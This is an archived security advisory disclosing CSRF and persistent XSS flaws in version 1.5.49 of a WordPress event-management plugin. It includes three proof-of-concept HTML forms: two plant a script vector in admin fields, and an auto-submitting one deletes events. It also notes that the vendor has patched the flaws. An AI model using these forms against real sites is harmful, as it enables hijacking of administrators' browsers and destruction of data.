Twenty Year Anniversary

WordPress Events Made Easy 1.5.49 CSRF / XSS

WordPress Events Made Easy 1.5.49 CSRF / XSS
Posted Oct 17, 2015
Authored by David Sopas

WordPress Events Made Easy plugin version 1.5.49 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
MD5 | f9721a4fb3517407f01cc8a6659e1085

WordPress Events Made Easy 1.5.49 CSRF / XSS

Change Mirror Download
Plugin link: https://wordpress.org/plugins/events-made-easy/
Active Installs: 10,000+
Version tested: 1.5.49
CVE Reference: Waiting
Original advisory:
https://www.davidsopas.com/events-made-easy-wordpress-plugin-csrf-persistent-xss/

Events Made Easy is a full-featured event management solution for
WordPress. Events Made Easy supports public, private, draft and
recurring events, locations management, RSVP (+ optional approval),
Paypal, 2Checkout, FirstData and Google maps. With Events Made Easy
you can plan and publish your event, or let people reserve spaces for
your weekly meetings. You can add events list, calendars and
description to your blog using multiple sidebar widgets or shortcodes;
if you are a web designer you can simply employ the template tags
provided by Events Made Easy.

When playing around with this plugin I noticed a couple of
vulnerabilities. In my opinion they are critical because they can
could cause damage to a WordPress installation.
All of them are related to CSRF where the vendor forgot to place a
security token (wp_nonce) on the affected forms.

#1 Add template CSRF + Persistent XSS

URL: /wp-admin/admin.php?page=eme-templates

If a authenticated admin clicks on the “Add template” button on a html
with this code:

<form action="https://victims_website/wp-admin/admin.php?page=eme-templates"
method="POST">
<input type="hidden" name="eme_admin_action" value="do_addtemplate" />
<input type="hidden" name="description" value="<svg/onload=confirm(1)>" />
<input type="hidden" name="format" value="csrf" />
<input type="submit" name="submit" value="Add template" />
</form>

It will add a Persistent XSS vector on the template description field.
This field is automatically executed when the admin visits the page
admin.php?page=eme-templates.

Possible attack scenario:

Malicious user checks that Events Made Easy is installed on a
WordPress installation
Malicious sends admin a link to the page that has a auto-submit
form with a XSS vector that hijacks victims browser
Victim visits the page and gets hijacked

#2 Add Form Field CSRF + Persistent XSS

URL: /wp-admin/admin.php?page=eme-formfields

If a authenticated admin clicks on the “Add field” button on a html
with this code:

<form action="https://victims_website/wp-admin/admin.php?page=eme-formfields"
method="POST">
<input type="hidden" name="eme_admin_action" value="do_addformfield" />
<input type="hidden" name="field_name" value="<svg/onload=confirm(1)>" />
<input type="hidden" name="field_type" value="1" />
<input type="hidden" name="field_info" value="csrf" />
<input type="hidden" name="field_tags" value="csrf" />
<input type="submit" name="submit" value="Add field" />
</form>

Like vulnerability #1 the attack scenario is the same. Same issue
affects form fields on this plugin.

#3 Remove events older than CSRF

URL: /wp-admin/admin.php?page=eme-cleanup

With this CSRF a malicious user could delete all the events older than
a certain number.
In my proof of concept I used a auto-submit form that could also be
used in vulnerabilities #1 and #2.

<form action="https://victims_website/wp-admin/admin.php?page=eme-cleanup"
name="dsopas" method="POST">
<input type="hidden" name="page" value="eme-cleanup" />
<input type="hidden" name="eme_admin_action" value="eme_cleanup" />
<input type="hidden" name="eme_number" value="1" />
<input type="hidden" name="eme_period" value="day" />
<input type="hidden" name="doaction" value="Apply" />
</form> <script> document.dsopas.submit(); </script>

Possible attack scenario:

Malicious user checks that Events Made Easy is installed on a
WordPress installation
Malicious sends admin a link to the page that has this auto-submit form
Without victim noticing, events older than 1 day will be removed.

Solution:
Vendor in a matter of few hours launched a patched version – 1.5.50.
Also he was kind enough to put my name on the changelog.

-David Sopas
davidsopas.com
@dsopas

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    26 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    2 Files
  • 7
    Oct 7th
    3 Files
  • 8
    Oct 8th
    23 Files
  • 9
    Oct 9th
    16 Files
  • 10
    Oct 10th
    15 Files
  • 11
    Oct 11th
    19 Files
  • 12
    Oct 12th
    16 Files
  • 13
    Oct 13th
    2 Files
  • 14
    Oct 14th
    2 Files
  • 15
    Oct 15th
    15 Files
  • 16
    Oct 16th
    20 Files
  • 17
    Oct 17th
    19 Files
  • 18
    Oct 18th
    21 Files
  • 19
    Oct 19th
    16 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close